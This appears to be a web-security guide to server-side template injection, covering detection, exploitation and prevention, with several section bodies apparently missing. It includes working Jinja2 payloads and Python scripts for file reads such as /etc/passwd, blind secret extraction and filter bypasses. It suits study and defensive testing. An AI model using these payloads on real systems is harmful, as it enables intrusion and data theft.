appsec.fyi

SSTI — A Practical Guide



Curated and synthesized by . Last updated 2026-06-29. Synthesized from 98 of 98 curated resources. Browse all 98 SSTI resources →

Problem Framing

Server-Side Template Injection (SSTI) is a critical web security vulnerability that arises when untrusted user input is processed by a server-side templating engine without proper sanitization or validation [1][2][3][4][5][6][7][8][9]. Templating engines, ubiquitous in modern web development, are designed to dynamically generate content, such as HTML, emails, or configuration files, by combining static templates with dynamic data. When user input directly influences the template's structure or content, it can be leveraged to inject malicious template syntax. This syntax is then executed server-side by the templating engine, potentially leading to severe consequences, including information disclosure, unauthorized access, denial of service, and, most critically, remote code execution (RCE) [1][10][3][4][5][6][7][8][9]. Unlike Cross-Site Scripting (XSS), which targets the client's browser, SSTI attacks the server directly [2].

The core of the vulnerability lies in the misuse of template engines, where they are instructed to interpret data that should have been treated as literal text as executable code [2][4]. This often happens when developers concatenate user input directly into template strings or dynamically construct templates based on user-supplied values, bypassing the intended separation between data and logic [1][2][3][4][5][11][9]. Many template engines are powerful and feature-rich, offering capabilities like variable interpolation, expressions, filters, control structures, and object introspection, which attackers can exploit to achieve their goals [2].

The impact of SSTI can be profound. Attackers can gain a foothold on the server, leading to a complete compromise of the application and its underlying infrastructure. This can involve exfiltrating sensitive data such as credentials, API keys, or configuration files, escalating privileges, or even using the compromised server as a pivot point for further attacks within the network [10][3][4][5][6][7][8][9]. The severity of SSTI is directly tied to the capabilities of the templating engine and the permissions of the process running the application. In many cases, successful exploitation leads to RCE, allowing attackers to execute arbitrary operating system commands [1][2][10][3][4][5][6][7][8][9].

Core Mechanics

Server-Side Template Injection occurs when user-controlled data is integrated into a server-side template without sufficient sanitization or escaping, leading the template engine to interpret this data as executable code. The process can be broken down into several key phases:

Template Engine Interaction

Templating engines act as intermediaries, transforming template files into dynamic content. They interpret special syntax within templates, such as {{ variable }} or ${ expression }, to substitute placeholders with actual data or execute logic [2][10][3][11][12]. The vulnerability arises when user input directly replaces or is embedded within this template syntax, rather than being treated as inert data. For instance, if a template expects a username like Hello {{ username }}, and the application concatenates user input directly into this string, an attacker could provide {{ 7*7 }} as the username, causing the server to render Hello 49 [2][4][5][11]. This simple arithmetic evaluation is often the first indicator of an SSTI vulnerability [3][4][5][13][11][8][12].

Input Vectors

User input can enter the templating engine through various application points, including URL parameters, form fields, HTTP headers, cookies, or even file uploads [2][14][15][16][12]. Any part of the application that dynamically incorporates user-supplied data into a server-side template is a potential injection vector [14][12]. For example, an application might use user input to determine which template to render, or to populate variables within a fixed template structure [4][9].

Exploitation Chains

Once an injection point is identified, attackers typically follow a methodology:

  1. Detection: This involves sending template syntax or mathematical expressions (e.g., {{7*7}}, ${7*7}, <%= 7*7 %>) to potential input points to see if they are evaluated server-side [2][3][14][5][13][8][12]. Error messages can also be instructive, sometimes revealing the template engine's identity [2][14][13][12].
  2. Identification: Determining the specific template engine (e.g., Jinja2, Twig, FreeMarker, ERB) is crucial, as syntax and available functions vary significantly [2][3][14][13][8][12]. This can often be achieved by observing how different payloads are processed (the same probe can evaluate differently in two engines that share a syntax) or by triggering specific error messages [2][14][13][12].
  3. Exploitation: Once the engine is identified, attackers leverage its capabilities to achieve their objective. This often involves exploring available objects and methods, particularly those that provide access to the underlying operating system or file system. Common techniques include accessing built-in functions for command execution or file manipulation, often through introspection of Python objects (__class__, __mro__, __subclasses__) or Java reflection [2][4][5][17][11][16][18][19].
  4. Sandbox Escapes: Many template engines offer sandboxing mechanisms to restrict potentially dangerous operations. Exploiting SSTI in a sandboxed environment requires finding ways to bypass these restrictions, often by abusing specific engine features or identifying flaws in the sandbox implementation [20][21][22][23][17][24][25][26][27][28][12].

The overall process relies on understanding how the specific template engine handles input and what functionalities it exposes to the template context.
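The detection and identification steps above can be scripted. The following is an added example, not code from the page or from the cited resources: render_vulnerable is a constructed stand-in for a Jinja2 sink that concatenates input into the template source, and fingerprint applies the {{7*7}} versus {{7*'7'}} distinction (Python string repetition gives 7777777 where PHP-style numeric coercion in Twig gives 49) to a render callable, which in a real engagement would wrap an HTTP request to the suspect parameter. The probe names and classification labels are mine.

```python
from jinja2 import Environment, TemplateError


def render_vulnerable(user_input):
    """Constructed target: the vulnerable concatenation pattern described above.
    In a real test this callable would be an HTTP request to the suspect parameter."""
    return Environment().from_string("Hello " + user_input).render()


# Probe payloads. The two {{ }} probes are the discriminator: Python string
# repetition yields 7777777 in Jinja2, PHP-style coercion in Twig yields 49.
PROBES = {
    "curly_math": "{{7*7}}",
    "curly_str_mul": "{{7*'7'}}",
    "dollar_math": "${7*7}",
    "erb_math": "<%= 7*7 %>",
}


def probe(render):
    """Send every probe through the render callable; keep errors as data."""
    results = {}
    for name, payload in PROBES.items():
        try:
            results[name] = render(payload)
        except TemplateError as exc:
            # A syntax or undefined error is evidence too: input reached a template parser.
            results[name] = "ERROR:" + type(exc).__name__
    return results


def fingerprint(render):
    """Classify the engine from probe results, decision-tree style."""
    r = probe(render)
    if "7777777" in r["curly_str_mul"]:
        return "jinja2"
    if "49" in r["curly_str_mul"]:
        return "twig-like"
    if "49" in r["curly_math"] or "49" in r["dollar_math"] or "49" in r["erb_math"]:
        return "other-evaluating"
    if any(v.startswith("ERROR:") for v in r.values()):
        return "parser-reached"
    return "not-evaluated"
```

Against a live target, replace render_vulnerable with a function that submits the payload and returns the response body; a "parser-reached" result means the input is being compiled as a template even if arithmetic is not echoed, and deserves follow-up with engine-specific error probes.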

Notable Techniques

The exploitation of SSTI vulnerabilities is highly dependent on the specific templating engine and the surrounding application's configuration. However, several common techniques and patterns emerge:

Object Introspection and Method Chaining

A prevalent technique, particularly in Python-based engines like Jinja2, involves navigating the object inheritance tree to access powerful built-in functionalities. By starting from a common object (e.g., an empty string ''), attackers can use attributes like __class__, __mro__, and __subclasses__ to discover and access classes and their methods, including those related to operating system interaction (os module) or file I/O (io._IOBase, io.FileIO) [4][17][11][16][18][19]. This allows for executing arbitrary commands or reading sensitive files.

For example, a Jinja2 payload might look like:

{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}

This payload reads /etc/passwd by calling whatever class sits at index 40 of object's __subclasses__() list with the file path [17][18]. That index is inherited from the Python 2 form of the payload, where object was __mro__[2] for a string and its 40th subclass was the built-in file type. On Python 3, __mro__[1] is object, but _io.FileIO is not a direct subclass of object (it inherits through _io._RawIOBase), and the position of any usable class depends on the interpreter version and on which modules the application has imported. In practice the list is enumerated and the target class is located by __name__ rather than by a fixed index. Similarly, reaching the os module, for example through the __globals__ of a located class's __init__, gives access to os.popen and hence command execution [4][11][16][18].
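An added example, not taken from the page or its sources, of why a fixed index is fragile and how the same chain is written robustly. find_subclass_index shows the host-side list the payload walks; LOCATE_BY_NAME walks it from inside the template, selects warnings.catch_warnings by name and reaches the built-in open through the globals of its pure-Python __init__. The explicit warnings import, the PATH_LITERAL marker, the function names and the throwaway file written by demo() are assumptions made for the demonstration; the sink is the same unsandboxed concatenation that the payload above targets.

```python
import warnings  # keeps warnings.catch_warnings alive; most apps import it indirectly anyway
from jinja2 import Environment


def find_subclass_index(name):
    """Host-side view of the list a payload walks: direct subclasses of object, in order.
    Returns -1 when no direct subclass has that name (e.g. FileIO on Python 3)."""
    for index, cls in enumerate(object.__subclasses__()):
        if cls.__name__ == name:
            return index
    return -1


# Payload that does not depend on a fixed index: iterate object.__subclasses__() inside
# the template, pick warnings.catch_warnings by __name__, and reach builtins through the
# __globals__ of its pure-Python __init__. PATH_LITERAL is replaced with a quoted path.
LOCATE_BY_NAME = (
    "{% for c in ''.__class__.__mro__[1].__subclasses__() %}"
    "{% if c.__name__ == 'catch_warnings' %}"
    "{{ c.__init__.__globals__['__builtins__']['open'](PATH_LITERAL).read() }}"
    "{% endif %}"
    "{% endfor %}"
)


def render_vulnerable(user_input):
    """Constructed sink: attacker-controlled template source, default (unsandboxed) environment."""
    return Environment().from_string(user_input).render()


def read_file_via_ssti(path):
    # repr() produces a quoted, escaped literal that Jinja2's lexer decodes like Python does.
    payload = LOCATE_BY_NAME.replace("PATH_LITERAL", repr(path))
    return render_vulnerable(payload)


def demo():
    """Write a throwaway file and read it back through the template engine."""
    import os
    import tempfile
    target = os.path.join(tempfile.mkdtemp(), "secret.txt")
    with open(target, "w") as fh:
        fh.write("flag{located-by-name}")
    return read_file_via_ssti(target)
```

Running find_subclass_index("catch_warnings") on two different interpreters, or before and after importing an extra module, returns different numbers; that is the whole reason the by-name form is preferred over [40] in anything other than a lab.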

Sandbox Escapes

Many template engines implement sandboxes to limit the functionality available to templates, preventing direct access to dangerous methods like os.system. However, these sandboxes are not always foolproof. Techniques for bypassing them include:

Filter Bypasses and Obfuscation

When direct access to attributes or keywords is blocked by blacklists, attackers employ various obfuscation techniques:

Time-Based and Blind SSTI

In scenarios where output is not directly reflected, attackers can use time-based payloads (e.g., sleep 5) to infer vulnerability by measuring response delays [14][13][39][9]. Boolean-based techniques involve crafting payloads that result in different responses (or errors) based on a condition, allowing for byte-by-byte data exfiltration [14][13][39][9].
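An added example of the boolean-based variant, not from the page or the cited writeups. blind_endpoint is a constructed sink that renders the input but returns only success or failure, standing in for an endpoint that answers 200 or 500 without echoing output; SECRET stands in for a value the application places in the template context. extract_secret asks one yes/no question per character, using {{ 1/0 }} so that a correct guess turns into an error response. A time-based version would run the same loop with a sleep call in place of the division; the boolean form is used here because it needs no process or OS access.

```python
import string
from jinja2 import Environment, TemplateError

# Constructed: stands in for a value the application exposes to the template context.
SECRET = "s3cr3t_k3y"


def blind_endpoint(user_input):
    """Constructed blind sink: renders the input, reports only True (rendered) or False (error)."""
    try:
        Environment().from_string("Welcome " + user_input).render(secret=SECRET)
        return True
    except (TemplateError, ZeroDivisionError):
        return False


ALPHABET = string.ascii_letters + string.digits + "_{}-"


def extract_secret(oracle, max_len=64, alphabet=ALPHABET):
    """Recover the context variable 'secret' one character at a time.
    The body {{ 1/0 }} only executes when the guessed character matches, so an
    error response is the 'true' branch of the oracle."""
    recovered = ""
    for i in range(max_len):
        for ch in alphabet:
            payload = "{% if secret[" + str(i) + "] == " + repr(ch) + " %}{{ 1/0 }}{% endif %}"
            if not oracle(payload):
                recovered += ch
                break
        else:
            # No candidate matched: past the end of the string (indexing past the end
            # yields an Undefined that compares unequal), or a character outside the alphabet.
            break
    return recovered
```

The same loop drives a time-based oracle by swapping the error condition for a measured delay, at the cost of one sleep per candidate character; against a real target, add a small repeat count per question to absorb network jitter.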

Detection and Prevention

The secure implementation of templating engines is paramount to preventing SSTI vulnerabilities. The primary defense revolves around strictly managing user input and leveraging the security features provided by the engines themselves.

Secure Coding Practices

The most effective way to prevent SSTI is to avoid processing untrusted user input directly within template strings or logic. Instead, user input should be treated as data and passed to templates as parameters, ensuring that the template engine always receives sanitized and properly escaped values [1][2][3][5][11][40][9].
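The practice described here, and the engine-side mechanism the next subsection refers to, as an added Jinja2 example rather than code from the page or its sources: a fixed template whose only variable part is the render() context, beside a SandboxedEnvironment for the case where users legitimately author templates. GREETING, render_safe and render_user_template are constructed names; SandboxedEnvironment and SecurityError are Jinja2's own.

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Fixed template: the structure is code owned by the application. User data only ever
# arrives through the render() context, so template syntax inside it stays inert text.
GREETING = "Hello {{ username }}"
app_env = Environment(autoescape=True)  # autoescape also covers the XSS side when output is HTML


def render_safe(username):
    return app_env.from_string(GREETING).render(username=username)


# Some products legitimately let users author templates (email or report templates).
# A fixed template is impossible there; the sandbox is the engine-side control. It
# refuses private/dunder attribute access, which cuts the __class__/__mro__ chain.
sandbox = SandboxedEnvironment(autoescape=True)


def render_user_template(user_template, **context):
    try:
        return sandbox.from_string(user_template).render(**context)
    except SecurityError as exc:
        # Log and reject; never fall back to the unsandboxed environment.
        return "blocked: " + str(exc)
```

Treat the sandbox as defence in depth rather than the primary control: the page's own sources document sandbox bypasses for several engines, so user-authored templates still warrant a minimal context (no config or request objects) and an allow-list of the filters and globals the feature actually needs.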

Leveraging Template Engine Security Features

Template engines often provide mechanisms to mitigate SSTI risks:

Defense in Depth

Beyond secure coding practices, a layered security approach provides additional protection:

Tooling

Several tools are invaluable for detecting and exploiting SSTI vulnerabilities, streamlining the process for security professionals.

Automated SSTI Detection and Exploitation Tools

Burp Suite Extensions

Fuzzing and Reconnaissance Tools

These tools significantly reduce the manual effort required for SSTI testing, allowing security professionals to identify and exploit these vulnerabilities more efficiently.

Recent Developments

The landscape of Server-Side Template Injection continues to evolve, with new vulnerabilities and bypass techniques being discovered regularly. Recent trends highlight the ongoing challenges in securing template engine implementations and the sophistication of exploitation methods.

Complex Sandbox Escapes and Filter Bypasses

Attackers are continually developing more intricate methods to bypass sandboxing mechanisms and filter lists within templating engines. These often involve deep introspection of object models, novel string manipulation techniques, and leveraging obscure engine features. For instance, research has shown how to bypass common blacklists in Jinja2 by using alternative attribute access methods, hexadecimal encoding, or string concatenation and joining functions [34][35][16][18]. Similarly, sophisticated bypasses have been demonstrated for FreeMarker by exploiting functions like ?lower_abc to encode restricted characters, thereby constructing RCE payloads despite input filters [27].
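The Jinja2 deny-list bypasses mentioned here, and in the Filter Bypasses and Obfuscation section above, as an added example not taken from the page or the cited writeups. DENY is a constructed deny-list of the kind a developer might bolt onto the vulnerable concatenation sink instead of fixing the design; each entry in BYPASSES reaches ''.__class__ without the blocked token appearing in the request, using Jinja2's attr filter together with the ~ operator, Python-style hex escapes in string literals, and the format filter. Function and dictionary names are mine.

```python
import re
from jinja2 import Environment

# Constructed: a deny-list bolted onto the vulnerable sink. It matches literal tokens only.
DENY = re.compile(r"__class__|__mro__|__subclasses__|__globals__|__builtins__")


def passes_filter(user_input):
    return DENY.search(user_input) is None


def render_filtered(user_input):
    """Constructed sink: deny-list check, then the unchanged vulnerable concatenation."""
    if not passes_filter(user_input):
        return "rejected"
    return Environment().from_string("Hello " + user_input).render()


# Each payload evaluates to ''.__class__ although the token __class__ never appears verbatim.
BYPASSES = {
    # attr does the lookup; ~ concatenates the attribute name at render time
    "attr + concat": "{{ ''|attr('__cl'~'ass__') }}",
    # Jinja2 string literals honour Python escapes, so hex escapes spell the name
    "attr + hex": r"{{ ''|attr('\x5f\x5fclass\x5f\x5f') }}",
    # the format filter (printf-style) builds the name from a pattern
    "attr + format": "{{ ''|attr('__cl%sss__'|format('a')) }}",
}


def run_bypasses():
    """Render every bypass through the filtered sink; each should leak <class 'str'>."""
    return {name: render_filtered(payload) for name, payload in BYPASSES.items()}
```

Every row of run_bypasses() renders the str class object, the first link of the introspection chain, while the obvious probe {{ ''.__class__ }} is rejected. Extending the deny-list to attr, ~ and \x merely moves the problem to the next operator; the fix is the structural one in the Detection and Prevention section, not a longer pattern.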

SSTI in Newer Frameworks and Languages

While SSTI is well-documented in mature languages like Python, Java, and PHP, recent research has focused on its prevalence and exploitation in less commonly studied environments. For example, there's growing attention on SSTI vulnerabilities in Go applications, where exploiting the html/template or text/template packages can lead to RCE by abusing method calls or insecurely exposed functionalities [48][49][50][51]. Additionally, vulnerabilities continue to be found in popular platforms and specific components, such as CVEs affecting Atlassian Confluence, ServiceNow, Grav CMS, and Spring Boot applications [20][52][53][54][55][56][57][58][59][60][25][26][30].

Chaining Vulnerabilities

SSTI is often chained with other vulnerabilities to achieve more impactful results. For example, a path traversal vulnerability might enable an attacker to control the template file path, leading to SSTI and subsequent RCE [61]. In other cases, a broken access control flaw could allow an authenticated user to modify template content, facilitating SSTI exploitation [20][22].

Research into Unconventional Payload Construction

Advanced techniques involve constructing payloads without relying on direct quotation marks or external resources, instead using inherent language features, object chains, or even specific template syntax constructs like Twig's block feature to bypass strict filtering [62][18]. The discovery of vulnerabilities related to Abstract Syntax Tree (AST) injection in JavaScript template engines like Handlebars and Pug demonstrates an evolving threat landscape where even the parsing process can be manipulated [63].

These developments underscore the need for continuous vigilance, deep understanding of templating engine internals, and robust security measures to counter the evolving SSTI threat.

Where to Go Deeper

For practitioners seeking to deepen their understanding and practical skills in Server-Side Template Injection, a wealth of resources exists. This includes detailed research papers, interactive labs, comprehensive cheat sheets, and specialized tooling.

Key Resources and References

Tools for Practice and Exploitation

By immersing oneself in these resources, practitioners can build a deep understanding of SSTI, from its fundamental mechanics to advanced exploitation techniques and effective mitigation strategies.

Sources cited in this guide

  1. SSTI: Explanation, Discovery, Exploitation, and Prevention — akto.io
  2. SSTI: Breaking Out of Templates — kayssel.com
  3. Inj3ctlab — SSTI Bug Bounty Labs Writeup — len4m.github.io
  4. What is SSTI in Flask/Jinja2? — Payatu — payatu.com
  5. Find and Exploit Server-Side Template Injection — TCM Security — tcm-sec.com
  6. What is Server-Side Template Injection? (Indusface) — indusface.com
  7. A Pentester's Guide to SSTI - Cobalt — cobalt.io
  8. OWASP Testing for Server Side Template Injection — owasp.org
  9. Server-side template injection | Web Security Academy — portswigger.net
  10. A Survey of the Overlooked Dangers of Template Engines (arXiv 2024) — arxiv.org
  11. SSTI Explained with Real Code Examples - Xygeni — xygeni.io
  12. Server-Side Template Injection | PortSwigger Research — portswigger.net
  13. Server Side Template Injection - Payloads All The Things — swisskyrepo.github.io
  14. PayloadsAllTheThings — SSTI README — github.com
  15. ruby-ssti: example Ruby ERB app vulnerable to SSTI — github.com
  16. Flask & Jinja2 SSTI cheatsheet — pequalsnp-team.github.io
  17. A Simple Flask (Jinja2) SSTI Example (Kleiber) — kleiber.me
  18. HackTricks: Jinja2 SSTI — book.hacktricks.xyz
  19. Exploiting server-side template injection vulnerabilities — portswigger.net
  20. Grav CMS Twig SSTI Authenticated Sandbox Bypass RCE — rapid7.com
  21. Grav CMS: Security Sandbox Bypass with SSTI — github.com
  22. Grav CMS: RCE via SSTI through Twig Sandbox Bypass — github.com
  23. Exploiting CVE-2021-25770: SSTI in YouTrack (Synacktiv) — synacktiv.com
  24. SSTI - Server-side template injection with a custom exploit (Scott Murray) — sc.scomurr.com
  25. Grav: SSTI via Twig escape handler advisory — github.com
  26. CVE-2023-49964: FreeMarker SSTI in Alfresco — github.com
  27. Synack: Discovering an SSTI vulnerability in FreeMarker — synack.com
  28. Template Injection Research | PortSwigger Research — portswigger.net
  29. GoSecure: Template Injection in Action workshop — gosecure.github.io
  30. GitHub Security Lab: SSTI in Apache Camel — CVE-2020-11994 — securitylab.github.com
  31. SSTI in Jinja2 allows RCE (changedetection.io) — github.com
  32. Exploiting SSTI in Thymeleaf — acunetix.com
  33. Exploiting SSTI in a Modern Spring Boot Application — modzero.com
  34. Jinja2 template injection filter bypasses (0day.work) — 0day.work
  35. Jinja2/Flask SSTI Filter bypass (MRLSECURITY) — mrlsecurity.com
  36. SSTI (The Hacker Recipes) — thehacker.recipes
  37. CVE-2025-23211: Jinja2 SSTI Turns Recipes Into RCE — vsec.com.br
  38. Jinja2 SSTI filter bypasses — medium.com
  39. SSTI: Transforming Web Apps from Assets to Liabilities — research.checkpoint.com
  40. Server-side template injection PortSwigger KB — portswigger.net
  41. Handlebars.js: Safe Usage to Avoid Injection Flaws — xygeni.io
  42. OpenMetadata: FreeMarker SSTI in email templates leads to RCE — github.com
  43. tplmap-python3: Python3 port (GitHub) — github.com
  44. Tplmap - Tool For Automatic SSTI Exploitation (GeeksforGeeks) — geeksforgeeks.org
  45. vladko312/SSTImap: Automatic SSTI detection tool with interactive interface — github.com
  46. epinna/tplmap: SSTI and Code Injection Detection and Exploitation Tool — github.com
  47. PayloadsAllTheThings: Server Side Template Injection — github.com
  48. Method Confusion in Go SSTIs Lead to RCE — onsecurity.io
  49. Exploiting SSTI in Golang Frameworks — payatu.com
  50. Golang SSTI: Safe by Default or Vulnerable by Design — oligo.security
  51. Bug Bytes #124: SSTI to RCE in Go apps (Intigriti) — blog.intigriti.com
  52. Active Exploitation of Confluence CVE-2022-26134 (Rapid7) — rapid7.com
  53. Atlassian Confluence Widget Connector Macro SSTI (ExploitDB) — exploit-db.com
  54. Strapi Security Disclosure: Multi-CVE SSTI chain — strapi.io
  55. CVE-2022-46166: Spring Boot Admin RCE — sangfor.com
  56. CVE-2021-43466: Thymeleaf Spring5 RCE — security.snyk.io
  57. SpringBootAdmin Thymeleaf SSTI to RCE — github.com
  58. ServiceNow RCE Exploitation Campaign — resecurity.com
  59. Multiple ServiceNow SSTI Vulnerabilities — censys.com
  60. ServiceNow RCE (CVE-2024-4879) Analysis — cyfirma.com
  61. CVE-2026-27641: Flask-Reuploaded Path Traversal Enabling SSTI RCE — github.com
  62. YesWeHack: Limitations are just an illusion — advanced SSTI exploitation with RCE everywhere — yeswehack.com
  63. AST Injection: Prototype Pollution to RCE in Handlebars — po6ix.github.io
  64. SSTI: RCE for the Modern Web App - Black Hat 2015 — blackhat.com
  65. HackTricks: SSTI (Server Side Template Injection) — book.hacktricks.xyz
  66. Don't Panic: The Thymeleaf Template Injection That Only Hurts If You Let It (CVE-2026-40478) — snyk.io
  67. SSTI: Advanced Exploitation Guide - Intigriti — intigriti.com
  68. CVE-2025-23211: Tandoor Recipes Jinja2 SSTI to RCE — offsec.com
  69. picoCTF 2025: SSTI2 Exploitation Writeup — medium.com
  70. picoCTF 2025: SSTI Challenge Writeup — medium.com